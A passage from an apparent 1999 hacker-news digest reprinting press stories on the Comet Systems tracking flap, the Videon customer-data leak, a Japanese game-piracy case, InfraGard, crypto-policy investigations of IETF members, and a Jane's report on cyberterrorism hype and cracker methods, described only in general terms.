track individual web surfing habits and will also seek certification from Truste, the industry privacy watchdog group. Truste's certification of Comet Systems could take 45 to 60 days. Associated Press - via San Jose Mecury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm Software firm in privacy flap BY TED BRIDIS Associated Press Writer WASHINGTON (AP) -- A company that offers free software to change an Internet browser's computer cursor into cartoon characters promised Tuesday to let people delete a serial number the company was using to track customers across the Internet. Responding to an outcry over the privacy implications of its software, Comet Systems Inc. also said it will seek certification from Truste, an organization that monitors whether Web sites are following the privacy promises they make to consumers. Truste said Comet Systems had ``significantly damaged the trust of their customers.'' New York-based Comet Systems acknowledged Monday that its cursor software -- used by more than 16 million people -- reports back to its own computers with each customer's unique serial number each time that person visits any of 60,000 Web sites that support its technology. Those sites include dozens aimed at young children, such as those for the Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty Inc. site for Beanie Babies. Comet said it never violated customers' privacy because it does not attempt to match its serial numbers against anyone's real-world identity. But it said Tuesday it will allow customers to delete those numbers, anyway, although the numbers helped Comet keep an accurate census of its customers for marketing and billing purposes. Some Web sites pay Comet based on the number of visitors using the cursor-changing technology. Customers will be able to download a program starting Wednesday from Comet's Web site, at www.cometsystems.com, to replace their serial number with a meaningless number that isn't unique. ``If that's what we need to do to appease users, we'll do that,'' spokesman Ben Austin said. Comet's certification to Truste could take 45 to 60 days. But that organization only monitors data collected at a company's Web site, not by its stand-alone software programs. ``We don't cover software privacy practices,'' Truste spokesman David Steer acknowledged Tuesday. ``Comet Systems has realized they have significantly damaged the trust of their customers, and they're looking at ways to rebuild that trust.'' Critics said earlier that the company should have more openly disclosed the behind-the-scenes transmissions, which are made without warning. They also said it would not be difficult given today's technology to begin correlating the Comet serial number with a consumer's identity if the company suddenly decided to or if Comet -- with its extensive tracking database -- were purchased by new owners willing to do that. ``The typical guy who goes to Best Buy and buys a computer and installs this software, he'll never know about this stuff,'' said programmer Dave Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to follow you around on the Internet.'' Steer, the spokesman for Truste, said other companies also undoubtedly are clandestinely monitoring the online behavior of their customers. ``I believe there are a lot of other software companies that are collecting personal information and not disclosing it,'' he said. ``That is just no longer acceptable.'' Internet discussion groups were filled Tuesday with messages from angry people who believed the cursor software did or could violate their privacy. In a statement published on the company's Web site, Comet President Jamie Rosen said the company was ``quite surprised'' at the privacy questions because the software doesn't ask for a customer's name, e-mail address or other personal information. ``We deeply regret that this has caused concern among our users and we pledge to be a leader in the area of online privacy in the future,'' he said. @HWA 07.0 Personal Info of Canadian ISP Users Leaked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Astroboyz and dj.tazz The personal information on almost 2,700 Internet users in Manitoba Canada was stolen and spread across the Internet. Users of the Videon Wave's Internet cable services had thier account numbers, along with customer names, addresses, phone numbers, user names and passwords stolen. The intrusion into Videon systems took place almost two weeks ago however the company never notified any of the effected customers. The incident has not been reported to the local Police or the RCMP. Winnipeg Free Press Does anyone have a better link? This one is about to expire. http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search Hackers tear cover off Videon security Tue, Nov 30, 1999 By Doug Nairne Legislature Reporter PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been obtained by Internet hackers in what is being called one of the most damaging computer attacks ever against a Manitoba company. The information has become a hot property as it is passed around the city's computer underground, while irate customers are demanding to know why Videon didn't notify them that their names, phone numbers and passwords had been taken. The list includes 2,688 Videon account numbers, along with customer names, addresses, phone numbers, user names and passwords. Reid Eby, an Internet security consultant and president of Interlink Online Services, said hackers could use the information to access people's Internet accounts and send and receive e-mail as if they were the owner. E-mail that has already been downloaded to a computer is safe, but all incoming messages can be intercepted. There is no impact on Videon cable TV subscribers, only cable modem users. "If they got the user names and passwords, this is the worst incident I've ever heard about locally," Eby said. "Given what is going on with hacking, placing any client information on-line in this day and age is silly." Eby said the Videon information would also be valuable for sale to direct marketers and junk mailers, who would covet the contact data for high-end computer users. Anyone who does any business transactions on-line may also be in danger, especially if their credit card numbers are transmitted back to them in a receipt. Hackers could also use the information to "socially engineer" a target, tricking people into revealing more information about themselves or making their computers vulnerable to intrusion. Videon spokeswoman Nadine Delisle said that a routine security sweep last week showed that customer information had been pilfered. She claimed that no passwords were obtained, although lists being circulated clearly include passwords, user names and other information. Despite the criminal nature of the intrusion, city police and RCMP said the incident has not been reported to their investigators. Sources say the hack took place during the second week of November, but none of the Videon customers contacted by the Free Press yesterday knew that anything had happened. "I'm a little surprised that we were never notified about this," said businessman Sam Katz, whose wife's personal cellular phone number is on the list, along with his other information. "I'd like to think these things are a little bit better secured." Delisle said Videon decided the information wasn't sensitive, so customers were not informed about the security breach. "The risk seemed to be very minimal," she said. "It was not assessed to be important." Katz disagreed, saying he plans to find out why he wasn't notified. Winnipeg police Const. Bob Johnson said companies often don't report hacking because they are concerned about bad publicity. Delisle said the incident was not "serious enough" to report to police. "We closed the security hole so that this will not happen again, that was the priority," she said. But a spokeswoman with the Canadian Radio-television and Telecommunications Commission said Videon customers can file a complaint against Videon and demand an explanation. "People should be able to get the reasons why their private information was leaked out," she said. The customer list contains a wide cross-section of Winnipeggers, including doctors, business people, university professors, journalists and even computer security experts. The hackers say they could pose as any one of the people on the list, although there is no evidence that anyone has done so yet. Hackers contacted said they were particularly pleased to get the personal information of one Videon customer -- a computer security expert who has written articles on the psychology of hackers, describing them as geeks and loners. Meanwhile, Ron Campbell, another cable modem customer whose details have been disclosed, said he is upset about the incident but that he doesn't blame Videon for the security breach. "I don't particularly think Videon could have stopped this from happening," he said. "I assume they had some security in place." PHOTO ILLUSTRATION BY JOE BRYKSA/WINNIPEG FREE PRESS Hackers managed to breach Videon's security and gain access to customers' personal files. @HWA 08.0 First Internet Piracy Case in Japan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Galleon A 21-year-old student has been accused of illegally distributing over 170 titles of game software for different Nintendo machines. This is the first case of an unauthorized delivery of game software via the Internet in Japan. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776 Hokkaido Police Pursue Unauthorized Net Delivery of Game Software December 1, 1999 (TOKYO) -- The Hokkaido Prefectural Police's Sapporo Kita Station alleged that a college student delivered unauthorized game software over the Internet. It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's Office for prosecution. The 21-year-old student, who has been accused of illegally distributing about 180 titles of game software for Family Computer (Famicon) and Game Boy game machines made by Nintendo Co., Ltd., is suspected of infringing on rights under the Copyright Law. The case is the first disclosure of an unauthorized delivery of game software via the Internet in Japan. The college student reportedly distributed the software on his own Web page,labeled as "information exchange," to seem as if the delivery did not constitute downloading of game software. Game software for sale is usually recorded in read-only memory (ROM). The student ran software which emulates a game machine on a personal computer, and stored the game software recorded in these ROMs on a hard disk drive on the PC and uploaded it onto a Web server. According to Association for Copyright for Computer Software (ACCS), which assisted the police in the disclosure of the case, there seemed to be a lot of downloading from the suspect's Web site, but it does not know how many downloads were actually made. An ACCS spokesman said that software distribution without authorization of an author itself is unlawful. In addition, the suspect knew the case was illegal, intentionally concealed the illegal uploading and downloading and distributed not just a few software programs over the Internet, the spokesman said. ACCS assumes there must be many other cases of illegal uploading and downloading of game software via the Internet. The association therefore hopes that the disclosure of the case will serve as a warning to the public. [Comment by BizTech] The disclosure of the illegal uploading and downloading of game software was based on a "breach of the Copyright Law." However, there are various applications of the Copyright Law depending on the case. In this case, the college student was suspected of "infringing on the right of public transmission under the Copyright Law." "The right of public transmission (Article 23 of the Copyright Law) is an author's proprietary right to transmit his or her work to the general public via broadcasting and/or communications. For example, an author's authorization will be needed for any broadcasting of a work in a television or radio program. (Note. In Japan, granting of copyrights and collection of license fees for the majority of musical works are performed by the Japanese Society for Rights of Authors, Composers and Publishers (JASRAC).) Distribution of works over the Internet is included in the public transmission right. Distribution of any software and musical data over the Internet shall constitute infringement on the public transmission right and thus breaches the Copyright Law. (Note. Any case which constitutes "reference" under the Copyright Law shall be excluded from this case.) For example, if someone transforms Celine Dion's hit number, "My heart will go on," into MIDI data without obtaining Dion's permission and plays the song on his or her own Web site as background music, strictly speaking such an act would constitute infringement or the public transmission right. (Note: Any works whose copyright is obviously expired shall be excluded from this case. For example, any distribution of MIDI data of well-known works such as a composition made by Mozart, Beethoven or Chopin, is generally legal.) In this case, the college student uploaded game software on a Web server without obtaining authorization of the authors of the game software, and enabled anybody who can access the Web site to download the software programs. This is called "enabling of public transmission." The case infringes on the public transmission right. In addition to infringing on the public transmission right, the suspected student also breached the Copyright Law for uploading of the game software on the Web server because the student made unauthorized copies of software (Infringement on the reproduction right, Article 21 of the Copyright Law). In the case, the suspect made unauthorized copies when copying the game software from ROMs to the hard disk drive of his or her PC and when copying it from the hard disk drive to a hard drive on the Web server. Because of the suspect's ultimate objective was to distribute of software over the Internet, the case does not constitute a "reproduction for private use" under Article 30 of the Copyright Law, and thus breaches the Copyright Law. The suspect repeatedly breached more than one provision of the Copyright Law, even though the other breaches were not disclosed. (Kazumi Tanaka, Deputy Editor, BizTech News Dept.) @HWA 09.0 FBI Launches InfraGuard in Ohio ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A national program known as InfraGuard, developed by the FBI to promote information sharing among law enforcement, industry, the academic community and the public about computer network intrusions and computer system vulnerabilities, was officially launched in Ohio yesterday. Over 200 people where expected at the kickoff meeting. (Watch for an exclusive insiders report on InfraGuard coming soon to HNN.) The Cincinnati Post http://www.cincypost.com/news/hacker112999.html C I N C I N N A T I P O S T FBI leads new effort to help thwart hackers Post staff report Nearly 200 people were expected at today's kickoff meeting of a group organized by the FBI to thwart hackers from breaking into government, industry and academic computer systems in Cincinnati and southern Ohio. Speakers included Cincinnati FBI agent in charge Sheri Farrar, Southern Ohio U.S. Attorney Sharon Zealey, Ohio Bureau of Criminal Identification and Investigation Superintendent Ted Almay and representatives from the FBI's National Infrastructure Protection Center. The regional meeting, held at Deer Creek State Park in Pickaway County, is part of a national program developed by the FBI and industry to promote information sharing among law enforcement, industry, the academic community and the public about computer network hacking and computer system vulnerabilities. So-called ''InfraGard'' chapters are designed to help protect the nation's information systems from cyber and physical threats. The Cincinnati FBI's chapter includes the 48 southern-most Ohio counties, including Cincinnati, Dayton and Columbus. A national InfraGard program was developed after President Clinton directed the FBI to identify and coordinate computer infrastructure protection experts inside and outside the federal government. Members of the Cincinnati chapter include the Ohio Supercomputer Center, American Electric Power, Ohio State University and Bank One. Members eventually will have access to an Alert Network that will allow them to use encryption technology to report attacks on their computer systems to the FBI. The FBI will provide what it calls a ''sanitized'' description of the incident, without identifying the source of the report, to other chapter members so they can take actions to protect their own systems. Members also will have access to an InfraGard Web site being created by the FBI that will provide timely information about computer protection issues. Target: Hackers InfraGard is seeking more regional chapter members from telecommunications, banking, energy and transportation industries, as well as from academic institutions, hospitals and government agencies. For more information, call Cincinnati FBI agent Roger Wilson at (513) 421-4310. Publication date: 11-29-99 @HWA 10.0 National Gun Database Goes Online ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A national gun database, Online Lead, was activated Tuesday at all 331 branches of the Treasury Department's Bureau of Alcohol, Tobacco and Firearms. The system is available to police and other local law enforcement officials through ATF offices. The database included the gun's make and serial number, and the complete chain of sale from manufacturer to wholesaler or distributor to the first retail sale by a federally licensed gun dealer. Officials have said that security measures to protect the database from malicious intruders has been taken but did not elaborate. Associated Press http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc Story Filed: Tuesday, November 30, 1999 11:44 AM EDT WASHINGTON (AP) -- Federal and local law enforcement officials are getting a new high-tech tool to fight crime: a nationwide computer system that aims to trace guns used during crimes. The system, called Online Lead, is administered by the Treasury Department's Bureau of Alcohol, Tobacco and Firearms and has been operating on a limited trial basis since February. ``Online Lead takes our fight against gun traffickers into cyberspace,'' said Treasury Secretary Lawrence Summers, who made the announcement today. ``It gives federal, state and local law enforcement officials throughout the country a new tool to help identify and arrest gun traffickers.'' Starting today the computer system is operating full time and is widely available. Specifically, the system is in use at all 331 ATF field offices. Although police and other local law enforcement officials can't tap directly into the system on their own, they can access the system through ATF. Local law enforcement officials are encouraged but not required to ask ATF to trace guns used during crimes. The results of those traces are entered into a growing national database, which now has information on more than 1 million traced firearms. ATF has been tracing guns used in crimes for years, but the sophisticated software used in the new online system should make it much easier for investigators to analyze trends and patterns in illegal firearms trafficking, law enforcement officials said. For police and other local law enforcers, the system may provide new leads and additional information about crimes, they said. Online Lead is updated frequently and provides information on a traced gun one day after it is completed. The new system evolved from earlier projects that aim to provide investigators access to data on guns used in crimes. Those systems stored information on traced guns on computer discs that had to be shipped to ATF field offices, a slow process. The new online system gives law enforcers fast access to such information. Information about all firearms traced by the ATF goes into the national database and is available on the new online system. What agents can trace is limited. They start with a gun's make and serial number, moving forward from the manufacturer to a wholesaler and distributor to the first retail sale by a federally licensed gun dealer. All sales by licensed dealers must be recorded, and those records must be made available to ATF. But any sales by individuals or by collectors at gun shows, for example, are considered private and exempt from such record-keeping requirements. Copyright © 1999 Associated Press Information Services, all rights reserved. @HWA 11.0 Zero Knowledge Ships Freedom, Finally ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jordan After what seemed like an agonizingly long beta period Zero Knowledge Systems has finally shipped Freedom 1.0. Freedom works seamlessly alongside your favorite browser and other Internet applications. You can surf the web, send email, chat, telnet, and participate in newsgroups as you normally would, only now with complete confidence that your personal information is not being collected without your consent. Freedom identifies you on the net with a 'nym' that you choose. There can be only one 'nym' so unless you want something like 'Tom4538720' you should reserve yours today. Freedom 1.0 http://www.zks.net/clickthrough/click.asp?partner_id=542 @HWA 12.0 OpenBSD 2.6 Ships ~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Theo What is probably the most secure operating system available has shipped its new version. OpenBSD 2.6 is a FREE, multi-platform 4.4BSD-based UNIX-like operating system. It emphasizes portability, standardization, correctness, proactive security and integrated cryptography. Some of the new features include the addition of ssh (OpenSSH) and Perl 5.005_03 to the base system, reliability patches for the PowerPC port, improved support for ext2fs, USB support, a faster install process and a lot more. OpenBSD http://www.openbsd.org/ @HWA 13.0 Videon Was Warned of Data Loss ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dj.tazz and P_Simm The Canadian ISP, Videon, was warned that it had left its customer database available on the web for all to see. Days later, after the database had made the rounds on the net the security issue was resolved. Customers however where never notified by the company. They did not find out about the problem until weeks later when it appeared in the local newspaper. Videon has confirmed that they received the emailed warning and failed to act in a timely manner to prevent the loss of customer account numbers, names, addresses, phone numbers, user names and passwords. Winnipeg Free Press http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search Videon ignored Web security breach E-mail warning of leak never received reply Wed, Dec 1, 1999 By Doug Nairne Legislature Reporter VIDEON WAS warned that its cable modem customer list was left unprotected on the Internet but failed to act for at least a day, allowing hackers a chance to pilfer the sensitive information, the Free Press has learned. An e-mail message identifying the security leak was sent to Videon security staff on Nov. 10, which is thought to be the day prior to when personal details on about 2,700 people were downloaded. A man who asked to be identified only by his computer user name, "Grub," said he sent the warning after stumbling on the customer data base while surfing the Videon Web site. Despite Videon's insistence that the information was taken after a "deliberate attack," Grub said he found it sitting out in the open where anyone could have seen it. "When I found this I thought, 'Holy smokes, I can't believe this is up there,' " he said. "They might as well have written out the list and taped it to the front door." Grub said he e-mailed Videon warning them of the problem but never received a reply. "They make it sound like a big computer attack, but it was probably just their own stupidity," he said. Sometime later, the list was discovered by someone else and copies began to be made. According to Videon, customer names, addresses and phone numbers have been posted to an Internet chat group, where it would be widely accessible. Videon spokeswoman Nadine Delisle confirmed that Videon received the warning e-mail. She said that a combination of bad judgment by staff and the Remembrance Day holiday resulted in the message initially being ignored. "At the time it was not perceived to be a big risk," she said. "In retrospect, that may have been an error in judgment." Hackers ended up getting what they describe as a gold-mine of information, including account numbers, names, addresses, phone numbers, user names and passwords. They say the information can be used to intercept people's e-mail or to assume someone else's identity on the Internet. After playing down the security leak Monday, Videon was scrambling to deal with the crisis yesterday. Senior executives and communications staff were in emergency meetings most of the day. Delisle said Videon was planning a massive e-mail broadcast to all its cable modem customers to inform them of the incident, and will provide instructions on how to take precautions like changing passwords. She said Videon also wants to reassure people that their billing information and credit card numbers were not revealed. An internal investigation is being carried out, and an outside firm will be brought in to do a full security audit, Delisle said. About a dozen angry customers called the Free Press yesterday, most wanting to know why Videon didn't tell anyone what had happened -- including the police -- until yesterday, more than two weeks after they found out the information was taken. While passwords can be quickly changed, other information like addresses and phone numbers are also being passed around, leaving people vulnerable. One woman, who asked not to be identified, said she is outraged that she was not told her information had been downloaded. "Anyone with a computer may be able to get my name and phone number, and address," she said. "My daughter won't be playing outside alone anytime soon, because now I won't know if some pervert has gotten my address and is lurking around my house." The woman said she is considering cancelling her account. Delisle said that in retrospect the decision to keep the incident quiet may not have been the right one. "We're still piecing together all the details of what happened," she said. "The important thing is that this does not happen again." Videon will set up a Web site to help customers at www.videon.ca/secure and also plans to take out ads in Winnipeg newspapers to explain what happened. Videon customers have set up at least one other site with instructions on changing passwords. After being on-line for only 90 minutes, the site had 29 hits. @HWA 14.0 German Digital Signature Chip Broke ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cripto After months of intense lobbying for a secure system and only days after being ratified by the European Union the German Digital Signature has been broken. The digital signature card, developed by Siemens, is to be used in cashless payment systems and access control systems. With data dumps of the SLC44/66 chip and information explaining its design floating around the Internet anyone using the so-called Geldkarte system stands the risk of having money transferred without their knowing it. The UK Register http://www.theregister.co.uk/991201-000021.html Posted 01/12/99 4:19pm by Mike Magee Siemens German digital signature chip hacked Hackers have succeeded in cracking the Siemens digital signature card used in cashless payment systems and access control systems across the country. The German Digital Signature was ratified by the European Union only a few days ago, after intense lobbying for a secure system for transactions. The serious breach of security means that anyone using the so-called Geldkarte system stands the risk of having money transferred without their knowing it. A dissasembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages of German text explaining the design has been available on bulletin boards for some time, according to the source. The dump is currently being re-engineered and commented, according to a source, and the knowledge gained has already been used to get hold of Telesec private keys. ® @HWA 15.0 IETF Members Under Investigation For Treason ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Some members of the Internet Engineering Task Force seem to be under investigation by the DOJ and FBI. The reason for the investigations seems to be the desire to include encryption and exclude back door capabilities in new protocols proposed by the IETF. The investigations are centered around treason charges. NT Security http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news ZD Net http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html Crypto Advocate Under FBI Investigation Tuesday, November 30, 1999 - We recently published a story regarding cryptography and IPv6, where somseone at the Department of Justice accused Scott Bradner, Internet Engineering Task Force (IETF) area coordinator, of an anti-social act by trying to get encryption inserted into the new protocol. Later, at an IETF meeting where votes were taken for IPv6 encryption inclusion, Fore System's Brian Rosen brazenly claimed that regardless of any encryption inclusion, Fore systems would proceed by including back doors into any included encryption technology. But the harrassment of the IETF doesn't stop there. Just how far will our federal government go towards controlling strong encryption? Apparently, very far. And this isn't a new effort by any means. We learned that William Allen Simpson, a Detroit-based computer consultant who was on the IETF staff, has been investigated by the federal government for treason charges. Simpson was the person that argued loudly for encryption to be included in the PPP protocol when it was still in design phases. That push landed Simpson in hot whatever with federal officials. Simpson learned through friends that he was under investigation for treason -- the FBI had been interviewing his friends and associates. Simpson obtained 54 pages of documents from the government under the Freedom of Information act, however the documents were heavily censored, including the bureau's basis for the investigation. According to a ZDTV report, Simpson did learn that the FBI had accused him of "challenging authority and laws that may impinge upon his activities." Wait a second! Isn't that part of what the Constitution is all about--the means to peacefully object to the laws of the land? I think so. And if that's true, then that certainly positions the FBI in a bad light since it would appear their actions are counter to the Consitutional rights. It not against the law to develop strong cryptography, but it is against the law to export that technology outside of proper governmental controls. The PPP protocol did not have encryption at the time--it was only a suggested inclusion--so why investigate a person for doing something completely legal? The IETF is an open public standards body that conducts its business in clear public view. They help stear standards that better ensure compatibility and interoperability. So why would the FBI investigate an IETF member just because that person suggested in a public meeting that strong encryption be included in a standard wide-spread protocol such as PPP? ZDnet; The New Crypto-Commies Could arguing for strong encryption be the next 'un-American activity' that justifies blacklists and secret FBI investigations? By Kevin Poulsen November 24, 1999 Newly released documents show that the FBI closely monitored a key member of the standard-setting Internet Engineering Task Force (IETF) in 1992 and 1993, as he waged a doomed battle to inject crypto support into an emerging critical Internet standard. William Allen Simpson, a Detroit-based computer consultant, was on the IETF. The team was developing the "Point to Point Protocol" (PPP), designed to facilitate Internet access over dial-up modems. Simpson was making waves in the PPP Working Group by loudly arguing for inclusion of crypto support in the protocol, which today is used by the vast majority of home Internet users to go online. In 1993, Simpson learned from a family member and colleagues that his efforts had drawn the FBI's interest. As he recalls it, the bureau was accusing him of a capital offense. "Two guys came up to me at a meeting," Simpson recalls. "They said, 'Bill, I was interviewed for a treason investigation by the FBI'." "Bill was advocating encryption for authentication and for privacy in standardized Internet protocols," recalls Electronic Frontier Foundation cofounder John Gilmore, who heard of the investigation and suggested that Simpson request his FBI file under the Freedom of Information Act. "He's kind of an iconoclast," Gilmore told me. "He follows his own way and sometimes it pisses people off, but it can be an advantage when you're faced with a Kafkaesque investigation by the government. He has the tenacity to stick with it until he finds the truth." After six years of wrangling, Simpson finally pried 54 pages from the grasping hands of the domestic spies last Wednesday, only to find that the documents were heavily censored. @HWA 16.0 Jane's Releases Cyberterrorism Report ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex Jane's Information Group has released its much anticipated report on cyberterrorism. While the actual information in the article seems rudimentary and crude its conclusions about the possibility of a full out terrorist attack over the internet being extremely remote seem dead on. (Warning this is an extremely long and dry article that presents litte new information.) Jane's Defense Weekly http://jir.janes.com/sample/jir0525.html Cyberterrorism hype With the 1990s propensity to dot.com everything that moves, 'hacking' and 'cyberterrorism' have become subjects of intense media coverage. Almost daily, hitherto unknown security specialists warn of potential catastrophes: news that gets picked up by the media and crosses the globe with impunity. Johan J Ingles-le Nobel discussed the subject with programmers at Slashdot to profile so-called cyberterrorists and examine the viability of cyberwarfare. Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth of the Internet, hacking horror stories have reached new heights of publicity, leading to a veritable media frenzy. Yet careful examination of the issue reveals much of the threat to be unsubstantiated rumour and media exaggeration. The exaggeration is understandable, however - these technologies underpin our entire society, and what paper can resist printing a scoop revealing that banks are being blackmailed with threats of attacks on their computers, or that a military satellite has been hijacked by hackers? The idea that an anonymous teenager working alone from his bedroom can wreak electronic havoc on the far side of the world makes for good press. What is a hacker? Nothing gets a hacker's back up quicker than someone confusing a hacker with cracker. The term 'hacker' refers to an individual who programmes enthusiastically (even obsessively), enjoys programming or is especially good at programming; a 'cracker' is somebody who breaks into another's computer systems or digs into their code (to make a copy-protected programme run). Yet the boundaries have become somewhat blurred and the popular understanding of these terms is is quite wrong: ever since Hollywood produced 'Wargames', based on Kevin Mitnic's cracking activities (known as 'exploits'), the term 'hacking' has become synonymous with unauthorised access into restricted systems - which is 'cracking'. In today's world, such activity also includes the deliberate defacement of websites. Hackers are quick to point out that there is a code of hacker ethics that precludes any profit from the activity - the only motive is the activity itself - but they are not naďve: realising the potential for misuse, they divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat' hackers (crackers). According to hackers, 99% of cracking incidents can be blamed on so-called 'script-kiddies'. These are usually young people who manage to acquire some 'cracking tools' somewhere on the Internet and are keen try them. They choose a 'cool' target (such as NASA, the Pentagon or the White House) and launch the tools. Older, more established hackers see them as upstarts. Think of a kid walking down a corridor testing doorknobs; whilst they are more than capable of defacing websites such as that of the Central Intelligence Agency (CIA), their actions are seen as the equivalent of putting down a whoopie cushion on the chair of the UN Secretary General - juvenile, noisy and somewhat embarrassing, but ultimately without real effect. Says Mick Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about waking up to find graffiti (which is all it is) on one of my customer's sites." However, even minor exploits illustrate one of the many paradoxes facing computer security. Specific websites, intended for the computer systems administrators and webmaster audiences, monitor the security vulnerabilities (bugs) in software that allow exploits to take place. The purpose of these websites is to distribute the corrective programming 'patches' that rectify the bugs. However, such sites are open to the public and are therefore the ideal place for crackers to discover new cracks. The result of this is that the vast majority of methods used by crackers to break into sites are known and there are patches available. This means that many believe the responsibility for security breaches lies not with the software supplier but with the company that owns and operates the system. Thus, if a company suffers a security breach, that highlights its own negligence or incompetence, which, along with the bad publicity associated with intrusions, makes it unsurprising that many companies are reluctant to publicise security breaches of their systems. This is especially true of the financial sector: there have been rumours for several years that banks have been blackmailed by hackers; confirmation has never been forthcoming. Cracker profile Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the Electronic Frontier, puts the total number of hackers at about 100,000, of which 10,000 are dedicated and obsessed computer enthusiasts. A group of 250­1,000 are in the so-called hacker 'élite', skilled enough to penetrate corporate systems and to unnerve corporate security. Given the huge number of people working as programmers for the online economy (the technical side of which requires much the same skills as those required by a hacker), the totals are sure to rise. According to the Center for Research on Electronic Commerce at the University of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2 million jobs in the USA alone. The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read English and follow directions. Indeed, much can be gleaned from books or documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst exploits can be learned from websites such as 'bugtraq', 'rootshell' or 'packetstorm'. In fact, virus-writing and exploit code is common, and some is even automated. However, to launch a sophisticated attack against a hardened target requires three to four years of practice in C, C++, Perl and Java (computer languages), general UNIX and NT systems administration (types of computer platform), LAN/WAN theory,remote access and common security protocols (network skills) and a lot of free time. On top of these technical nuts and bolts, there are certain skills that must be acquired within the cracker community. 'Hi, I'm Cheryl, I'm new in IT support. I'm having trouble with the modem bank. Can you check the modem to make sure it's turned on? Also, can I have the number to make sure I'm using the right one?' Of course, being a diligent and helpful worker, the recipient of such a call may be only too happy to help. Tools of the trade The cracker skillset is more common in highly educated individuals taught in the USA and Western Europe, although anyone with enough intelligence and time can pick it up without formal schooling. In fact, the skills are not at all rare or unusual, being the same as those required for an average, small or medium-sized company network system administrator: a position which commands among the lowest pay in the computer industry. The chances are that there is a university drop-out in your town with all of these prerequisites. That said, a list of qualifications does not fully explain their make-up, as the skillset is more to do with lifestyle than specific capabilities. Some people collect baseball cards; others analyse [computer network] protocols. Attacks happen in various guises, from the simple and automated to the highly disguised and sophisticated. Crackers also write their own tools, which are disseminated in the underground. Certain system diagnostic tools and other cracker script tools can significantly automate the process of cracking less secure systems. At the low end of the sophistication scale there are activism websites, such as 'Floodnet', which hold web-page functionality that automates the process of reloading another website's pages in an attempt to make the system 'overheat' so that it ceases to work. This is a form of the most common exploit, Denial of Service (DoS), which comes in many forms. It is most common due to webmasters and web server administrators creating poorly written Common Gateway Interface (CGI) scripts (website programming). Exploiting the poorly written code is no great feat. In the words of one hacker: "Any punk kid could do this to any organisation without any trouble whatsoever." Computer specialists suggest that, while annoying, such unsophisticated DoS attacks have a hidden danger: they could mask the use of specialist software custom-written by an élite cracker amid the noise of the barrage of multiple automated attacks. Other tools exist that are designed by the hacker community, such as BO2000, which was specifically created to embarrass Microsoft's Windows NT security. In fact, the size of the black market in software (computer programmes) is enormous. Not only can exploit tools be procured in this manner, but they can easily be found online. Social engineering Social engineering is a term describing the process whereby crackers engineer a social situation that allows any potential cracker to obtain access to an otherwise closed network. This access could either be permanent (infiltrating an insider into the organisation who enables outside access), or temporary. Indeed, the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT support. I'm having trouble with the modem bank. Can you check the modem to make sure it's turned on? Also, can I have the number to make sure I'm using the right one?" Of course, being a diligent and helpful worker, the recipient of such a call is only too happy to help. Most previous instances of information technology (IT) security violations have been attributable to 'inside jobs', which is why there has been significant controversy recently about US concerns hiring foreign programmers to rectify Y2K issues. Having gained access, a cracker can either install code directly into the systems on the spot or add a transmitter device. To illustrate a scenario, after gaining access to a facility as cleaning staff, the perpetrator could put a small computer, itself connected to the main network, into the base of a lamp with an infra-red port (network connection) aimed out the window of an office or linked to a mobile phone. This gives an active presence on the target network and, more importantly, remote access to the device from anywhere within line of sight. In commercial environments, the security teams that search for bugs (bugs in the classical sense - 'listening devices') with receivers do not generally do infra-red profiles of a building; such a device will not transmit unless active, so sweeping for it is more difficult than trying to detect a bug that is monitoring audio. Cellular modems also work, but are potentially detectable by radio-frequency sweeps. However, for corporate espionage it is an easy matter to pre-position several such systems and then take advantage of security vulnerabilities to gain permanent entry to the system. The phone company makes entry easy if the location is near a residential area as a receiving mobile phone just needs to be plugged into the network interface (telephone connection) of any house. Such attacks are not new, but the scale of machines necessary to realise them is down to 4in2 of PC board for an amateur willing to spend a little time shopping in the back of a technology magazine. "For less than US$1,000 you could build such systems and disguise them as appliances like lamps," said Paul Roberts, a US-based information security (INFOSEC) specialist. Espionage on other computers by remotely monitoring the electro-magnetic (EM) signals they emit whilst in use is possible today, albeit expensive. Figures of $35,000 are quoted as estimates for a remote monitoring station in a van, for example, although the cost is coming down. "EM snooping technology might very well come into the reach of the advanced information security hobbyist or the determined criminal in the next five to 10 years," said Markus G Kuhn from the Computer Laboratory at Cambridge University in the UK. Cracking: methods Exploits come mainly in three species: DoS; destruction of information (erasing); and corruption of information 